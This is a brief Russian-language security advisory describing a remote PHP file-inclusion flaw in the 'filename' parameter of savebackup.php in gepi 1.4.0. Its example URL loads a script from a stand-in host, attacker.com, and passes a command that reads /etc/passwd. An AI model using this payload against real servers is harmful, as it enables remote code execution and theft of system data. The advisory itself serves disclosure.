Программа: gepi 1.4.0

Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе.
Уязвимость существует из-за недостаточной обработки входных данных в параметре «filename» сценарием savebackup.php. Удаленный пользователь может выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера. 

Пример: 

http://localhost/gepi/gestion/savebackup.php?filename= http://attacker.com/test.txt&cmd=cat /etc/passwd



Оставить мнение